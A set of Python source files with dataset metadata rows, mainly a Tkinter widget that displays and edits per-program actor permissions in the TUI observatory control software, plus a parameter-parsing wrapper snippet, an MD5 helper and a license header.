args = parser.parse_args()
config = orjson.loads(args.config) if args.config else {}
user = args.user
parent_args = orjson.loads(args.parent_args) if args.parent_args else []
log_level = args.log_level
if not isinstance(config, dict):
raise TypeError(f"Pack config needs to be a dictionary (was {type(config)}).")
parameters = {}
if args.parameters:
LOG.debug("Getting parameters from argument")
args_parameters = args.parameters
args_parameters = orjson.loads(args_parameters) if args_parameters else {}
parameters.update(args_parameters)
if args.stdin_parameters:
LOG.debug("Getting parameters from stdin")
i, _, _ = select.select([sys.stdin], [], [], READ_STDIN_INPUT_TIMEOUT)
if not i:
raise ValueError(
(
"No input received and timed out while waiting for "
"parameters from stdin"
)
)
stdin_data = sys.stdin.readline().strip()
if not stdin_data:
# This could indicate that parent process (e.g. process which runs the tests has
# incorrectly opened the stdin and that one is then inherited by the process which is
# spawning it which will cause issues)
raise ValueError("Received no valid parameters data from sys.stdin")
try:
stdin_parameters = orjson.loads(stdin_data)
stdin_parameters = stdin_parameters.get("parameters", {})
except Exception as e:
msg = (
"Failed to parse parameters from stdin. Expected a JSON object with "
'"parameters" attribute: %s' % (six.text_type(e))
)
raise ValueError(msg)
parameters.update(stdin_parameters)
LOG.debug("Received parameters: %s", parameters)
if not isinstance(parent_args, list):
raise TypeError(f"The parent_args is not a list (was {type(parent_args)}).")
obj = PythonActionWrapper(
pack=args.pack,
file_path=args.file_path,
config=config,
parameters=parameters,
user=user,
parent_args=parent_args,
log_level=log_level,
)
obj.run()
| 37.090909 | 99 | 0.65802 |
795b027dbeba0fe77c3835759b3398722d015116 | 37,353 | py | Python | TUI/TUIMenu/Permissions/PermsTableWdg.py | ApachePointObservatory/TUI | 8f130368254161a2748167b7c8260cc24170c28c | [
"BSD-3-Clause"
] | 1 | 2020-01-28T06:28:00.000Z | 2020-01-28T06:28:00.000Z | TUI/TUIMenu/Permissions/PermsTableWdg.py | ApachePointObservatory/TUI | 8f130368254161a2748167b7c8260cc24170c28c | [
"BSD-3-Clause"
] | 1 | 2017-06-05T22:53:58.000Z | 2017-06-05T22:53:58.000Z | TUI/TUIMenu/Permissions/PermsTableWdg.py | r-owen/TUI | 8f130368254161a2748167b7c8260cc24170c28c | [
"BSD-3-Clause"
] | 1 | 2020-01-28T06:28:02.000Z | 2020-01-28T06:28:02.000Z | #!/usr/bin/env python
"""Specify what users from each program are allowed to do.
Note: the interface visible to the user uses the terms "add" and "delete"
because they are clear and succinct. However, the internal code use the
perms terminology "register" and "unregister" because they work
better in function calls when one might be toggling the state
and because the transition has to occur somewhere.
2003-12-19 ROwen Preliminary version; html help is broken.
2003-12-29 ROwen Implemented html help.
2004-07-22 ROwen Updated for new RO.KeyVariable
2004-07-29 ROwen Added read-only support.
2004-08-11 ROwen Use modified RO.Wdg state constants with st_ prefix.
2004-09-03 ROwen Modified for RO.Wdg.st_... -> RO.Constants.st_...
2004-11-16 ROwen Modified for RO.Wdg.Label change.
2005-01-06 ROwen Modified to use RO.Wdg.Label.setSeverity instead of setState.
Modified to use Checkbutton autoIsCurrent instead of
a separate changed indicator.
Fixed a bug in setReadOnly that prevented reliable toggling.
Fixed and improved test code.
2005-06-03 ROwen Stopped setting checkbutton padx and pady (rely on new decent defaults).
Fixed irregular indentation (extra spaces).
2006-06-16 ROwen Bug fix: helpSuffix arg was being ignored (caught by pychecker).
2006-04-10 ROwen Fix PR 314: if a new actor was added, it was not properly displayed.
Modified so "sort" sorts actorList as well as programs.
2006-10-31 ROwen Fix PR 511: program name widgets too narrow on unix.
2009-07-06 ROwen Fix PR 940: permissions window does not handle new actorList properly.
Modified to always sort actorList; only programs may be out of order.
Modified for updated TestData.
2009-07-09 ROwen Bug fix: bad class instance reference.
Modified test code to look more like tuisdss version.
2011-04-06 ROwen Modified to order actors by category. To do: display separation between categories.
2011-04-08 ROwen Renamed from PermsInputWdg to PermsTableWdg and made self-contained
(no need to create external frames for the header and scrolled table).
2011-07-27 ROwen Modified to find PermsModel in TUI.Models.
2011-08-12 ROwen Modified to highlight actor and program when the mouse is over a permission control.
2011-09-12 ROwen Bug fix: resizing was somewhat messed up.
Improved alignment, especially on unix.
2011-09-28 ROwen Bug fix: sorting and purging caused display errors
because _nameSpacerWdg was not reliably ungridded and regridded.
2011-10-12 ROwen Bug fix: the row 2 permissions had a line across it after sorting (the width measuring frame).
2012-07-09 ROwen Modified to use RO.TkUtil.Timer.
2012-08-10 ROwen Updated for RO.Comm 3.0.
2012-11-13 ROwen Stop using Checkbutton indicatoron=False because it is no longer supported on MacOS X.
2012-11-19 ROwen Fix PR 1396: program button sent the wrong command.
2013-10-11 ROwen Removed an unused import (weakref) and an unused variable.
"""
import Tkinter
import RO.Constants
import RO.Alg
if __name__ == "__main__":
import RO.Comm.Generic
RO.Comm.Generic.setFramework("tk")
from RO.Comm.Generic import Timer
import RO.KeyVariable
import RO.Wdg
import TUI.TUIModel
import TUI.Models.PermsModel
_HelpPrefix = "TUIMenu/PermissionsWin.html#"
_ProgramWidth = 10 # width of program control buttons: need room for "Lockout" and checkbuttons
_NewActorDelay = 1.0 # display disable delay (sec) while adding or removing actorList
class ActorList(object):
"""A list of actorList in category order
Also keeps track of the title widgets, for highlighting the current one
"""
def __init__(self, startCol=1):
self._startCol = int(startCol)
self._actorSet = set()
self._colActorList = []
self._titleWdgDict = {}
def setActors(self, actors):
"""Set the actors
Inputs:
- actors: a collection of actors; order is ignored
"""
self._actorSet = set(actors)
# sort by category, then by actor name
catActorList = sorted((self._getActorCategory(a), a) for a in actors)
currCat = 1
col = self._startCol
self._colActorList = []
for cat, actor in catActorList:
if cat != currCat:
self._colActorList.append((col, None))
currCat = cat
col += 1
self._colActorList.append((col, actor))
col += 1
def getTitleWdg(self, actor):
"""Return the title widget for this actor, or None if not found
"""
return self._titleWdgDict.get(actor)
def setTitleWdg(self, actor, wdg):
"""Set the title widget for an actor
"""
self._titleWdgDict[actor] = wdg
def clearAllTitleWdg(self):
"""Clear all title widgets
"""
self._titleWdgDict.clear()
def getColActorList(self):
"""Return a list of (col, actor)
"""
return self._colActorList
def getActorSet(self):
"""Return the collection of actors as a set"""
return self._actorSet
def isSameActors(self, actors):
"""Return True if the set of actors is the same (ignoring order)
"""
return self._actorSet == set(actors)
def _getActorCategory(self, actor):
"""Return a category number for a given actor
Returns one of:
1: tcc, telmech and tlamps
2: instruments
3: guiders: dcam, ecam, gcam, tcam
"""
return dict (
gmech = 1,
tcc = 1,
telmech = 1,
tlamps = 1,
dcam = 3,
ecam = 3,
gcam = 3,
tcam = 3,
).get(actor, 2)
def __bool__(self):
return len(self._actorSet) > 0
class PermsTableWdg(Tkinter.Frame):
"""Inputs:
- master master widget
- statusBar status bar to handle commands.
- readOnlyCallback a function that is called when the readOnly state changes;
the function receives one argument: isReadOnly: True for read only, False otherwise.
Note that isReadOnly always starts out True.
"""
def __init__(self,
master,
statusBar,
readOnlyCallback = None,
):
Tkinter.Frame.__init__(self, master)
self._statusBar = statusBar
self._tuiModel = TUI.TUIModel.getModel()
self._readOnlyCallback = readOnlyCallback
self._actorList = ActorList(startCol=1)
self._progDict = {} # prog name: prog perms
self._titleWdgSet = []
self._titleBorder = Tkinter.Frame(self, borderwidth=2, relief="sunken")
self._titleBorder.grid(row=0, column=0, sticky="ew")
self._titleBorder.grid_columnconfigure(1, weight=1)
self._titleFrame = Tkinter.Frame(self._titleBorder, borderwidth=0)
self._titleFrame.grid(row=0, column=0, sticky="w")
self._scrollWdg = RO.Wdg.ScrolledWdg(
master = self,
hscroll = False,
vscroll = True,
borderwidth = 2,
relief = "sunken",
)
self._scrollWdg.grid(row=1, column=0, sticky="nsew")
self._tableFrame = Tkinter.Frame(self._scrollWdg.getWdgParent(), borderwidth=0)
self._vertMeasWdg = Tkinter.Frame(self._tableFrame)
self._vertMeasWdg.grid(row=0, column=0, sticky="wns")
self._scrollWdg.setWdg(
wdg = self._tableFrame,
vincr = self._vertMeasWdg,
)
self.grid_rowconfigure(1, weight=1)
self._nextRow = 0
self._readOnly = True
self._updActorTimer = Timer()
self.permsModel = TUI.Models.PermsModel.getModel()
self.permsModel.actors.addCallback(self._updActors)
self.permsModel.authList.addCallback(self._updAuthList)
self.permsModel.lockedActors.addCallback(self._updLockedActors)
self.permsModel.programs.addCallback(self._updPrograms)
self._lockoutRow = 3
self._lockoutWdg = _LockoutPerms(
master = self._titleFrame,
actorList = self._actorList,
readOnly = self._readOnly,
row = self._lockoutRow,
statusBar = self._statusBar,
)
statusBar.dispatcher.connection.addStateCallback(self.__connStateCallback)
def purge(self):
"""Remove unregistered programs.
"""
knownProgs = self.permsModel.programs.get()[0]
# use items instead of iteritems so we can modify as we go
for prog, progPerms in self._progDict.items():
if progPerms.isRegistered() or prog in knownProgs:
continue
progPerms.delete()
del(self._progDict[prog])
def sort(self):
"""Sort existing programs and redisplay all data.
"""
self._actorList.clearAllTitleWdg()
for wdg in self._titleWdgSet:
wdg.destroy()
for col, actor in self._actorList.getColActorList():
if not actor:
# insert dividor
self._addTitle(" ", col)
else:
titleLabel = self._addTitle(actor, col)
self._actorList.setTitleWdg(actor, titleLabel)
self._lockoutWdg.display(row=self._lockoutRow)
progNames = self._progDict.keys()
progNames.sort()
self._nextRow = 0
for prog in progNames:
progPerms = self._progDict[prog]
progPerms.display(row=self._nextRow)
self._nextRow += 1
def _addProg(self, prog):
"""Create and display a new program.
Called when the hub informs this widget of a new program
(to add a program send the suitable command to the hub,
don't just call this method).
"""
prog = prog.upper()
newProg = _ProgPerms(
master = self._tableFrame,
prog = prog,
actorList = self._actorList,
readOnly = self._readOnly,
row = self._nextRow,
statusBar = self._statusBar,
)
self._nextRow += 1
self._progDict[prog] = newProg
def _addTitle(self, text, col):
"""Create and grid a title label and two associated
width measuring frames (one in the title frame, one in the main frame).
Inputs:
- text text for title
- col column for title
Returns the title label
"""
# print "_addTitle(%r, %r)" % (text, col)
strWdg = RO.Wdg.StrLabel(
master = self._titleFrame,
text = text,
)
strWdg.grid(row=0, column=col)
titleSpacer = Tkinter.Frame(self._titleFrame)
titleSpacer.grid(row=1, column=col, sticky="new")
mainSpacer = Tkinter.Frame(self._tableFrame)
mainSpacer.grid(row=0, column=col, sticky="new")
self._titleWdgSet += [strWdg, titleSpacer, mainSpacer]
def dotitle(evt):
# print "dotitle: titlewidth = %r, mainwidth = %r" % (
# titleSpacer.winfo_width(), mainSpacer.winfo_width(),
# )
if titleSpacer.winfo_width() > mainSpacer.winfo_width():
mainSpacer["width"] = titleSpacer.winfo_width()
titleSpacer.bind("<Configure>", dotitle)
def domain(evt):
# print "domain: titlewidth = %r, mainwidth = %r" % (
# titleSpacer.winfo_width(), mainSpacer.winfo_width(),
# )
if mainSpacer.winfo_width() > titleSpacer.winfo_width():
titleSpacer["width"] = mainSpacer.winfo_width()
mainSpacer.bind("<Configure>", domain)
return strWdg
def __connStateCallback(self, conn):
"""If the connection closes, clear all programs from the list.
"""
if self._progDict and not conn.isConnected:
for prog, progPerms in self._progDict.items():
progPerms.delete()
del(self._progDict[prog])
def _updActors(self, actors, isCurrent=True, **kargs):
"""Perms list of actors updated.
"""
# print "%s._updActors(%r)" % (self.__class__, actors,)
if not isCurrent:
return
if self._actorList.isSameActors(actors):
return
if not self._readOnly and self._actorList:
self._statusBar.setMsg("Updating actors", severity=RO.Constants.sevWarning, isTemp = True, duration=_NewActorDelay * 1000.0)
self._setReadOnly(True)
self._updActorTimer.start(_NewActorDelay, self._setReadOnly, False)
self._actorList.setActors(actors)
# Update lockout and each program
self._lockoutWdg.updateActorList()
for progPerms in self._progDict.itervalues():
progPerms.updateActorList()
# display new header and everything
self.sort()
def _updPrograms(self, programs, isCurrent=True, **kargs):
"""Hub's list of registered programs updated.
Delete old programs based on this info, but don't add new ones
(instead, look for an authList entry for the new program,
so we get auth info at the same time).
"""
if not isCurrent:
return
# print "_updPrograms(%r)" % (programs,)
# raise program names to uppercase
programs = [prog.upper() for prog in programs]
if self._tuiModel.getProgID().upper() not in programs:
# print "my prog=%s is not in programs=%s; currReadOnly=%s" % (prog, programs, self._readOnly)
self._setReadOnly(True)
# mark unregistered programs
anyUnreg = False
for prog, progPerms in self._progDict.iteritems():
if prog not in programs:
# mark progPerms as unregistered
anyUnreg = True
progPerms.setRegistered(False)
# if read only, then automatically purge (if necessary) and sort
if self._readOnly:
if anyUnreg:
self.purge()
self.sort()
def _setReadOnly(self, readOnly):
"""Set read only state.
"""
readOnly = bool(readOnly)
if self._readOnly != readOnly:
self._readOnly = readOnly
# print "toggling readOnly to", self._readOnly
self._lockoutWdg.setReadOnly(self._readOnly)
for progPerms in self._progDict.itervalues():
progPerms.setReadOnly(self._readOnly)
if self._readOnlyCallback:
self._readOnlyCallback(self._readOnly)
def _updAuthList(self, progAuthList, isCurrent=True, **kargs):
"""New authList received.
progAuthList is:
- program name
- 0 or more actorList
"""
if not isCurrent:
return
# print "_updAuthList(%r)" % (progAuthList,)
prog = progAuthList[0].upper()
authActors = progAuthList[1:]
if prog == self._tuiModel.getProgID().upper():
# this is info about me (my program); check if I can set permissions
readOnly = "perms" not in authActors
# print "prog=%s is me; readOnly=%s, currReadOnly=%s, actorList=%s" % (prog, readOnly, self._readOnly, authActors)
self._setReadOnly(readOnly)
isNew = prog not in self._progDict
if isNew:
# print "program %s is not in program dict; adding" % (prog,)
self._addProg(prog)
progPerms = self._progDict[prog]
progPerms.setRegistered(True)
progPerms.setCurrActors(authActors)
def _updLockedActors(self, lockedActors, isCurrent=True, **kargs):
"""Hub's locked actor list updated.
"""
if not isCurrent:
return
self._lockoutWdg.setCurrActors(lockedActors)
class _BasePerms(object):
"""Basic set of permissions.
Display current locked actorList as a set of checkbuttons.
Handle read only, help and the action of clicking a button.
Specialize to handle lockout or programs.
Inputs:
- master master widget
- actorList an ActorList
- row row at which to grid display widgets
- statusBar object to handle commands (via doCmd)
"""
def __init__(self,
master,
actorList,
readOnly,
row,
statusBar,
prog = "",
helpSuffix = "",
):
# print "_BasePerms(master=%s, actorList=%s, readOnly=%s, row=%s, prog=%s)" % (master, actorList, readOnly, row, prog)
self._master = master
self._actorList = actorList
self._readOnly = readOnly
self._row = row
self._statusBar = statusBar
self._prog = prog
self._helpURL = _HelpPrefix + helpSuffix
self._testWdg = Tkinter.Label(self._master) # to determine current bg color
self._nameSpacerWdg = Tkinter.Label(
master,
text = "",
width = _ProgramWidth,
)
self._nameSpacerWdg.grid(row=row, column=0)
self._createNameWdg()
# dictionary of actor: auth checkbutton entries
self._actorWdgDict = {}
self.updateActorList()
def delete(self):
"""Cleanup
"""
wdgSet = self._actorWdgDict.values() # all widgets to destroy
if self._nameSpacerWdg is not None:
wdgSet.append(self._nameSpacerWdg)
self._nameSpacerWdg = None
if self._nameWdg is not None:
wdgSet.append(self._nameWdg)
self._nameWdg = None
self._actorWdgDict = RO.Alg.OrderedDict()
for wdg in wdgSet:
wdg.grid_forget()
wdg.destroy()
def actorInfoIsConsistent(self):
return self._actorList.getActorSet() == set(self._actorWdgDict.keys())
def display(self, row):
"""Display widgets in the specified row.
If widgets are already displayed, they are first withdrawn.
Replaces the exisiting actor order.
Raises ValueError if the set of actorList does not match.
"""
# check actorList
# print "%s.display(row=%s)" % (self, row)
if not self.actorInfoIsConsistent():
listActors = sorted(list(self._actorList.getActorSet()))
dictActors = sorted(self._actorWdgDict.keys())
raise ValueError("cannot display perms for %s; my actorList %r != %r" % \
(self, listActors, dictActors))
self._row = row
self._nameSpacerWdg.grid_forget()
self._nameWdg.grid_forget()
self._nameSpacerWdg.grid(row=self._row, column=0, sticky="ew")
self._nameWdg.grid(row=self._row, column=0, sticky="ew")
for col, actor in self._actorList.getColActorList():
if actor:
wdg = self._actorWdgDict[actor]
wdg.grid_forget()
wdg.grid(row=self._row, column=col)
def updateActorList(self):
"""The actorList has been updated
"""
#print "%s.updateActorList()"
currActorSet = set(self._actorWdgDict.keys())
newActorSet = self._actorList.getActorSet()
if currActorSet == newActorSet:
return
# ungrid and delete any deleted actorList
for actor in currActorSet - newActorSet:
self._actorWdgDict[actor].grid_forget()
del(self._actorWdgDict[actor])
# create any new actorList (they will be gridded later as part of display)
for actor in newActorSet - currActorSet:
if actor in self._actorWdgDict:
raise ValueError("%r: actor %r already exists" % (self, actor))
wdg = _ActorWdg (
master = self._master,
prog = self._prog,
actor = actor,
readOnly = self._readOnly,
command = self._actorCommand,
helpURL = self._helpURL,
)
self._actorWdgDict[actor] = wdg
def hl(evt, actor=actor):
self._doHighlight(evt, actor)
def unHl(evt, actor=actor):
self._unHighlight(evt, actor)
wdg.bind("<Enter>", hl)
wdg.bind("<Leave>", unHl)
self.display(self._row)
def _doHighlight(self, evt, actor):
titleWdg = self._actorList.getTitleWdg(actor)
if titleWdg:
titleWdg["background"] = "yellow"
self._nameWdg["background"] = "yellow"
evt.widget["background"] = "yellow"
def _unHighlight(self, evt, actor):
titleWdg = self._actorList.getTitleWdg(actor)
normalBackground = self._testWdg["background"]
if titleWdg:
titleWdg["background"] = normalBackground
self._nameWdg["background"] = normalBackground
evt.widget["background"] = normalBackground
def setCurrActors(self, currActors):
"""Sets the list of actorList that should be checked (authorized).
Inputs:
- currActors: list of actorList that should be checked
"""
# print "%s.setCurrActors(%r)" % (self.__class__, currActors)
for actor, wdg in self._actorWdgDict.iteritems():
isAuth = actor in currActors
wdg.setAll(isAuth)
def setReadOnly(self, readOnly):
"""Update read only state.
"""
# print "_BasePerms.setReadOnly(%r)" % (readOnly,)
readOnly = bool(readOnly)
if self._readOnly != readOnly:
self._readOnly = readOnly
try:
self._nameWdg.setReadOnly(readOnly)
except AttributeError:
pass
for wdg in self._actorWdgDict.itervalues():
wdg.setReadOnly(readOnly)
def _actorCommand(self):
"""Called when an actor button is pressed by hand.
"""
# print "%s._actorCommand()" % (self.__class__)
actorList = [
actor for actor, wdg in self._actorWdgDict.iteritems()
if wdg.getBool()
]
actorList.sort()
cmdStr = "%s %s" % (self._getCmdPrefix(), ' '.join(actorList),)
self._doCmd(cmdStr)
def _cmdFailed(self, *args, **kargs):
"""Called when a command fails; resets default state."""
# handle name widget specially; it may not be an active control
try:
self._nameWdg.restoreDefault()
except AttributeError:
pass
for wdg in self._actorWdgDict.itervalues():
wdg.restoreDefault()
def _getCmdPrefix(self):
"""Return the command prefix"""
raise NotImplementedError("_createNameWdg must be defined by the subclass")
def _createNameWdg(self):
"""Create self._nameWdg.
"""
raise NotImplementedError("_createNameWdg must be defined by the subclass")
def _doCmd(self, cmdStr):
"""Execute a command.
"""
cmd = RO.KeyVariable.CmdVar(
actor = "perms",
cmdStr = cmdStr,
callFunc = self._cmdFailed,
callTypes = RO.KeyVariable.FailTypes,
)
self._statusBar.doCmd(cmd)
def __del__(self):
self.delete()
def __repr__(self):
return "%s" % (self.__class__.__name__)
class _LockoutPerms(_BasePerms):
"""Lockout permissions
This class keeps track of locked actorList,
displays the info as a set of controls
and responds to these controls by sending the appropriate commands.
Inputs:
- master master widget
- actorList a list of the currently known actorList, in desired display order
- row row at which to grid display widgets
- statusBar object to handle commands (via doCmd)
"""
def __init__(self, master, actorList, readOnly, row, statusBar):
_BasePerms.__init__(self,
master = master,
actorList = actorList,
readOnly = readOnly,
row = row,
statusBar = statusBar,
prog = "",
helpSuffix = "Lockout",
)
def _getCmdPrefix(self):
"""Return the command prefix"""
return "setLocked"
def _createNameWdg(self):
"""Create self._nameWdg.
"""
self._nameWdg = RO.Wdg.StrLabel (
master = self._master,
text = "Lockout",
anchor = "center",
helpText = "lock out non-APO users",
helpURL = self._helpURL,
)
def setCurrActors(self, currActors):
# print "_ProgPerms %s setCurrActors(%r)" % (self, currActors)
_BasePerms.setCurrActors(self, currActors)
someChecked = bool(currActors)
if someChecked:
self._nameWdg.setSeverity(RO.Constants.sevWarning)
else:
self._nameWdg.setSeverity(RO.Constants.sevNormal)
def __str__(self):
return "Lockout"
class _ProgPerms(_BasePerms):
"""Permissions for one program.
This class keeps track of the permissions,
displays the info as a set of controls
and responds to these controls by sending the appropriate commands.
Inputs:
- master master widget
- prog program name
- actorList a list of the currently known actorList, in desired display order
- row row at which to grid display widgets
- statusBar object to handle commands (via doCmd)
"""
def __init__(self, master, prog, actorList, readOnly, row, statusBar):
# print "_ProgPerms(master=%s, prog=%s, actorList=%s, readOnly=%s, row=%s)" % (master, prog, actorList, readOnly, row)
_BasePerms.__init__(self,
master = master,
actorList = actorList,
readOnly = readOnly,
row = row,
statusBar = statusBar,
prog = prog,
helpSuffix = "ProgEntry",
)
def isRegistered(self):
"""Returns True if desired state is registered,
False otherwise.
"""
return self._nameWdg.getRegInfo()[1]
def setCurrActors(self, currActors):
# print "_ProgPerms %s setCurrActors(%r)" % (self, currActors)
_BasePerms.setCurrActors(self, currActors)
self._nameWdg.setCanUnreg("perms" not in currActors)
def setRegistered(self, isReg):
"""Set registered or unregistered state.
"""
# print "%s %s.setRegistered(%r)" % (self._prog, self.__class__, isReg)
self._nameWdg.setRegistered(isReg)
for wdg in self._actorWdgDict.itervalues():
wdg.setRegInfo(isReg, isReg)
def _getCmdPrefix(self):
return "set program=%s" % (self._prog,)
def _createNameWdg(self):
"""Create the name widget; a checkbutton
that, when checked, unregisters the program.
"""
self._nameWdg = _ProgramWdg (
master = self._master,
prog = self._prog,
command = self._progCommand,
readOnly = self._readOnly,
helpText = "Uncheck to delete program %r" % (self._prog),
helpURL = self._helpURL,
)
self._nameWdg.addCallback(self._progCallFunc)
def _progCommand(self):
"""Called when the program name button is pushed by hand.
Sends the appropriate command(s) to the hub.
See also _progCallFunc, which controls actor enabling.
"""
# print "%s._progCommand" % (self.__class__)
doReg = self._nameWdg.getBool()
# issue register or unregister command
if doReg:
cmdVerb = "register"
else:
cmdVerb = "unregister"
cmdStr = '%s %s' % (cmdVerb, self._prog)
self._doCmd(cmdStr)
# if re-registering, restore permissions
if doReg:
self._actorCommand()
def _progCallFunc(self, wdg=None):
"""Called when the program name button is toggled by any means.
Sets enabled of actorList.
See also progCommand, which sends commands to the hub.
"""
# print "%s._progCallFunc" % (self.__class__)
actReg, desReg = self._nameWdg.getRegInfo()
# set enable of actor wdg
for wdg in self._actorWdgDict.itervalues():
wdg.setRegInfo(actReg, desReg)
def __str__(self):
return self._prog
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, self._prog)
class _SettingsWdg(RO.Wdg.Checkbutton):
"""Widget to toggle a setting (actor permission or delete program).
"""
def __init__(self,
master,
prog,
readOnly,
helpURL = None,
**kargs):
self._prog = prog
self._readOnly = readOnly
RO.Wdg.Checkbutton.__init__ (self,
master = master,
helpURL = helpURL,
autoIsCurrent = True,
isCurrent = False,
**kargs)
self["disabledforeground"] = self["foreground"]
self._saveActorInfo()
self._setState()
def _saveActorInfo(self):
"""Save actor settings that allow us to
enable and disable the actor button appropriately.
"""
pass
def setAll(self, val):
"""Set the current and default value.
"""
self.setDefault(val)
self.set(val)
self._setState()
def _setState(self):
pass
def setReadOnly(self, readOnly):
readOnly = bool(readOnly)
if readOnly != self._readOnly:
self._readOnly = readOnly
self._setState()
class _ActorWdg(_SettingsWdg):
"""Minimal widget to display a checkbutton and a changed indicator.
This widget has 3 states:
- read only: user can view permissions but not change anything
- registered: program is registered and user can change settings
- not exists: program unregistered so settings disabled
(read only and unregistered is irrelevant since read only users
only see registered programs)
"""
def __init__(self,
master,
actor,
prog,
readOnly,
helpURL = None,
**kargs):
self._actor = actor
self._actReg = True
self._desReg = True
_SettingsWdg.__init__(self,
master = master,
prog = prog,
readOnly = readOnly,
helpURL = helpURL,
**kargs)
def setReadOnly(self, readOnly):
_SettingsWdg.setReadOnly(self, readOnly)
# print "%s %s setReadOnly(%r)" % (self._prog, self._actor, readonly)
def _setState(self):
"""State changed and not transitional; update widget appearance and help.
"""
isChecked = self.getBool()
# print "%s %s _ActorWdg._setState; readOnly=%s; isChecked=%s, actReg=%s; desReg=%s" % \
# (self._prog, self._actor, self._readOnly, isChecked, self._actReg, self._desReg)
if self._readOnly:
self.setEnable(False)
if self._prog:
if isChecked:
self.helpText = "%s may use %s" % (self._prog, self._actor)
else:
self.helpText = "%s may not use %s" % (self._prog, self._actor)
else:
if isChecked:
self.helpText = "%s is locked out" % (self._actor,)
else:
self.helpText = "%s is available" % (self._actor,)
return
if self._actReg and self._desReg:
self.setEnable(True)
if self._prog:
if isChecked:
self.helpText = "%s may use %s; uncheck to prohibit" % (self._prog, self._actor)
else:
self.helpText = "%s may not use %s; check to allow" % (self._prog, self._actor)
else:
if isChecked:
self.helpText = "%s is locked out; uncheck to unlock" % (self._actor,)
else:
self.helpText = "%s is unlocked; check to lock out" % (self._actor,)
else:
# program not registered or in transition, so user cannot change permissions
self.setEnable(False)
if not self._desReg:
self.helpText = "Re-add %s to enable" % (self._prog)
else:
self.helpText = "%s being added; please wait" % (self._prog)
def setRegInfo(self, actReg, desReg):
actReg = bool(actReg)
desReg = bool(desReg)
if (self._desReg, self._actReg) != (desReg, actReg):
self._actReg = actReg
self._desReg = desReg
self._setState()
class _ProgramWdg(_SettingsWdg):
"""Widget for showing program name.
When disabled, shows up as a label and help is gone.
When enabled, shows up as a checkbutton with the text as the button
(rather than text next to a separate checkbox).
"""
def __init__(self, *args, **kargs):
# handle defaults and forced settings
tuiModel = TUI.TUIModel.getModel()
self._canUnreg = True # can program be unregistered? some are fixed
prog = kargs.get("prog")
currProg = tuiModel.getProgID()
if currProg and currProg.lower() == prog.lower():
dispText = "*" + prog
else:
dispText = prog
kargs["text"] = dispText
_SettingsWdg.__init__(self, *args, **kargs)
def _saveActorInfo(self):
"""Save actor settings that allow us to
enable and disable the actor button appropriately.
"""
self._enabledPadX = int(str(self["padx"]))
self._enabledPadY = int(str(self["pady"]))
self._borderWidth = int(str(self["borderwidth"]))
self._disabledPadX = self._enabledPadX + self._borderWidth
self._disabledPadY = self._enabledPadY + self._borderWidth
def setEnable(self, doEnable):
# print "%s _ProgWdg.setEnable(%r)" % (self._prog, doEnable)
_SettingsWdg.setEnable(self, doEnable)
if doEnable:
self.configure(
padx = self._enabledPadX,
pady = self._enabledPadY,
borderwidth = self._borderWidth,
)
else:
self.configure(
padx = self._disabledPadX,
pady = self._disabledPadY,
borderwidth = 0,
)
def getRegInfo(self):
"""Returns actReg, desReg
"""
return (self.getDefBool(), self.getBool())
def _setState(self):
"""State changed; update widget appearance and help.
"""
# print "%s _ProgWdg._setState; readOnly=%s; canUnreg=%s" % (self._prog, self._readOnly, self._canUnreg)
if self._readOnly:
self.setEnable(False)
self.helpText = "Permissions for program %s" % (self._prog,)
return
if not self._canUnreg:
self.setEnable(False)
self.helpText = "%s may not be deleted" % (self._prog,)
return
self.setEnable(True)
actReg, desReg = self.getRegInfo()
if actReg:
self.helpText = "%s added; uncheck to delete" % (self._prog,)
else:
self.helpText = "%s deleted; check to re-add" % (self._prog,)
def setRegistered(self, isRegistered):
self.setAll(isRegistered)
def setReadOnly(self, readOnly):
# print "%s _ProgWdg.setReadOnly(%s)" % (self._prog, readOnly,)
_SettingsWdg.setReadOnly(self, readOnly)
def setCanUnreg(self, canUnreg):
"""Indicate whether a program can be unregistered or is always registered.
"""
canUnreg = bool(canUnreg)
if canUnreg != self._canUnreg:
self._canUnreg = canUnreg
self._setState()
if __name__ == "__main__":
import TestData
root = TestData.tuiModel.tkRoot
root.resizable(False, True)
DefReadOnly = False
statusBar = RO.Wdg.StatusBar(
master = root,
dispatcher = TestData.tuiModel.dispatcher
)
testFrame = PermsTableWdg(
master = root,
statusBar = statusBar,
)
testFrame.pack(side="top", expand=True, fill="y")
testFrame._setReadOnly(DefReadOnly)
statusBar.pack(side="top", fill="x")
def doReadOnly(but):
readOnly = but.getBool()
testFrame._setReadOnly(readOnly)
butFrame = Tkinter.Frame(root)
Tkinter.Button(butFrame, text="Demo", command=TestData.animate).pack(side="left")
RO.Wdg.Checkbutton(butFrame, text="Read Only", defValue=DefReadOnly, callFunc=doReadOnly).pack(side="left")
butFrame.pack(side="top", anchor="w")
TestData.start()
root.mainloop()
| 35.472934 | 136 | 0.591465 |
795b02bb7ed00d69eb86ca68665bc6b47a207eb9 | 241 | py | Python | utils/Md5Util.py | junnzhan/spark_learn | 9a53c076a0aaba76d5ce4beacfd6cc7a9bb4faa7 | [
"Apache-2.0"
] | null | null | null | utils/Md5Util.py | junnzhan/spark_learn | 9a53c076a0aaba76d5ce4beacfd6cc7a9bb4faa7 | [
"Apache-2.0"
] | null | null | null | utils/Md5Util.py | junnzhan/spark_learn | 9a53c076a0aaba76d5ce4beacfd6cc7a9bb4faa7 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import hashlib
class Md5Util(object):
@staticmethod
def getMd5(raw):
return hashlib.md5(raw.encode()).hexdigest()
if __name__ == '__main__':
print(Md5Util.getMd5('jun'))
| 17.214286 | 52 | 0.639004 |
795b02bed7f185bee9b94d466b40a7bc7ea37c74 | 2,227 | py | Python | google_compute_engine/distro/sles_11/utils.py | anilyigitfiliz/compute-image-packages | c1db6992039bdf2ccdcda2ce73adc6cbe8675601 | [
"Apache-2.0"
] | null | null | null | google_compute_engine/distro/sles_11/utils.py | anilyigitfiliz/compute-image-packages | c1db6992039bdf2ccdcda2ce73adc6cbe8675601 | [
"Apache-2.0"
] | null | null | null | google_compute_engine/distro/sles_11/utils.py | anilyigitfiliz/compute-image-packages | c1db6992039bdf2ccdcda2ce73adc6cbe8675601 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
# Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
